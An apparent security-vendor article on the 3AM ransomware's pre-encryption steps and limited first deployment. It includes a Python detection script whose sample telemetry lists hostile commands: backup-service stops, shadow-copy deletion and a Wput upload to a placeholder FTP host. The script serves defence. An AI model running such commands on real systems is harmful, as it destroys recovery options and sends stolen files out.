In a digital realm teeming with evolving cyber threats, a new variant named the 3AM ransomware has recently surfaced, marking its presence with a distinct modus operandi. This article delves into the discovery, characteristics, and implications of this emerging malware, shedding light on the ever-evolving landscape of cybersecurity.
The spotlight initially fell on 3AM when it was employed as a fallback plan by a ransomware affiliate. The threat operator had previously attempted to deploy the notorious LockBit ransomware, often attributed to the Bitwise Spider or Syrphid groups, but encountered obstacles. As a result, the threat actor resorted to 3AM, making this malware’s existence known.
A defining feature of 3AM is its code. The ransomware is written in Rust, a language not associated with any known ransomware family, which sets it apart as a wholly new and uncharted strain. The creators and affiliates behind 3AM remain unidentified, with no discernible connections to established cybercrime groups.
Before encrypting files, 3AM performs a series of pre-encryption steps. It attempts to disable multiple services running on the compromised system, specifically targeting security and backup products from prominent vendors such as Veeam, Acronis, Ivanti, McAfee, and Symantec. This removes the products most likely to interrupt the encryption process. Once encryption is complete, files receive the “.THREEAMTIME” extension. Additionally, the malware attempts to delete Volume Shadow Copies, removing the option of restoring files from those snapshots.
A 3AM ransomware attack begins with a “gpresult” command, which dumps the system’s policy settings for a designated user. This reconnaissance phase is followed by commands commonly used for network enumeration, server enumeration, and user persistence, and by use of the Wput FTP client to transmit stolen files to the threat operator’s server. Symantec’s analysis reveals that the 3AM executable recognizes various command-line parameters, including an access key, an encryption method (local or net), and parameters that control encryption speed.
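The pre-encryption behaviour described above (a gpresult query, stops of backup and security services, shadow-copy deletion, Wput exfiltration, and the “.THREEAMTIME” extension) is exactly the kind of chain a SOC can hunt for in process-creation telemetry before encryption completes. The following Python is an added example written for this article; it is not code from the article, from Symantec, or from the malware. The article describes the steps but not the exact commands, so the command-line shapes matched here (`net stop` / `sc stop`, `vssadmin delete shadows`, `gpresult /user`, a `wput` binary) and the sample event records are assumptions constructed for illustration.

```python
"""Heuristic hunt for 3AM-style pre-encryption activity in process telemetry.

Added example, not from the article or Symantec. The command-line shapes and
the sample records below are constructed assumptions for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Tuple

# Vendors the article names as targets of the service-stop step.
TARGETED_VENDORS = ("veeam", "acronis", "ivanti", "mcafee", "symantec")
# Extension the article reports on files after encryption.
ENCRYPTED_EXT = ".threeamtime"

# ASSUMED command-line patterns for each step (the article does not quote them).
SERVICE_STOP_RE = re.compile(r'\b(?:net|sc)(?:\.exe)?\s+stop\s+"?(.+?)"?\s*$', re.I)
SHADOW_DELETE_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)
GPRESULT_RE = re.compile(r"\bgpresult(?:\.exe)?\b.*?/user\b", re.I)
WPUT_RE = re.compile(r"\bwput(?:\.exe)?\b", re.I)


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: host, ordering sequence number, command line."""
    host: str
    seq: int
    cmdline: str


def classify(event: ProcEvent) -> Optional[str]:
    """Return the 3AM-style step an event resembles, or None if it is benign."""
    cmd = event.cmdline
    m = SERVICE_STOP_RE.search(cmd)
    if m and any(v in m.group(1).lower() for v in TARGETED_VENDORS):
        return "service_stop_security_or_backup"
    if SHADOW_DELETE_RE.search(cmd):
        return "shadow_copy_deletion"
    if GPRESULT_RE.search(cmd):
        return "gpresult_recon"
    if WPUT_RE.search(cmd):
        return "wput_exfil"
    return None


def is_encrypted_artifact(path: str) -> bool:
    """True if a file path carries the extension the article attributes to 3AM."""
    return path.lower().endswith(ENCRYPTED_EXT)


def assess_host(events: Iterable[ProcEvent]) -> Tuple[str, Dict[str, List[int]]]:
    """Group one host's events by step and return (verdict, steps-by-sequence).

    A stop of a backup/security service together with shadow-copy deletion is
    the impact pair a responder should treat as encryption being imminent.
    """
    steps: Dict[str, List[int]] = {}
    for ev in sorted(events, key=lambda e: e.seq):
        tag = classify(ev)
        if tag:
            steps.setdefault(tag, []).append(ev.seq)
    impact = {"service_stop_security_or_backup", "shadow_copy_deletion"}
    if impact.issubset(steps):
        return "probable_pre_encryption", steps
    if steps:
        return "suspicious", steps
    return "clean", steps


def summarize(events: Iterable[ProcEvent]) -> Dict[str, Tuple[str, Dict[str, List[int]]]]:
    """Run assess_host for every host present in the event stream."""
    by_host: Dict[str, List[ProcEvent]] = {}
    for ev in events:
        by_host.setdefault(ev.host, []).append(ev)
    return {host: assess_host(evs) for host, evs in by_host.items()}


# Constructed sample telemetry (not real 3AM data): ws01 shows the full chain,
# ws02 shows ordinary admin activity that must not fire.
SAMPLE_EVENTS = [
    ProcEvent("ws01", 1, "gpresult.exe /user jdoe /v"),
    ProcEvent("ws01", 2, 'net.exe stop "Veeam Backup Service"'),
    ProcEvent("ws01", 3, 'net.exe stop "Acronis Agent Core"'),
    ProcEvent("ws01", 4, "vssadmin.exe delete shadows /all /quiet"),
    ProcEvent("ws01", 5, "wput.exe C:\\staging\\dump.zip ftp://198.51.100.7/"),
    ProcEvent("ws02", 1, "net.exe stop Spooler"),
    ProcEvent("ws02", 2, "gpresult.exe /r"),
]

if __name__ == "__main__":
    for host, (verdict, steps) in summarize(SAMPLE_EVENTS).items():
        print(host, verdict, steps)
```

Running the block classifies ws01 as probable pre-encryption (all four steps present, in order) and ws02 as clean, because a stop of a non-backup service and a plain `gpresult /r` are routine. The vendor list and the impact pair are the article’s own facts; everything that turns them into a matcher is an assumption to be tuned against your telemetry.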
Despite being a new and relatively unfamiliar threat, 3AM’s debut in the cyber arena was unsuccessful. In the incident in question, the threat actor deployed the ransomware on only three machines within the target organization. Encouragingly, defense mechanisms thwarted its activities on two of these systems, highlighting the resilience of existing cybersecurity measures.
The emergence of 3AM ransomware underscores the ever-evolving nature of cyber threats. As it gained prominence as an alternative to LockBit, it will likely attract the interest of other malicious actors. The cybersecurity community should remain vigilant, as 3AM may evolve and adapt, potentially posing a more significant threat.
The rise of 3AM ransomware is a stark reminder of the perpetual cat-and-mouse game between cybercriminals and defenders. While this new entrant was only partially successful in its debut, its existence signals a potential shift in the threat landscape. As cybersecurity professionals continue to adapt and fortify their defenses, the world watches closely for the next chapter in this ongoing cyber saga.
At SpearTip, our certified engineers work at our 24/7/365 Security Operations Center to continuously monitor companies’ data networks for new and current ransomware threats. They are ready to respond to incidents at a moment’s notice. Our risk assessments are designed to uncover security gaps and are accompanied by a technical summary complete with an individualized risk report detailing necessary steps to remediate the gaps. The ShadowSpear Platform, our integrable managed detection and response tool, uses comprehensive insights through unparalleled data normalization and visualizations to expose sophisticated unknown and advanced ransomware threats. Providing cybersecurity awareness training will help companies and their employees better understand the risks of the cyber landscape and develop impactful cybersecurity practices that can reduce the likelihood of cyberattacks.
If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.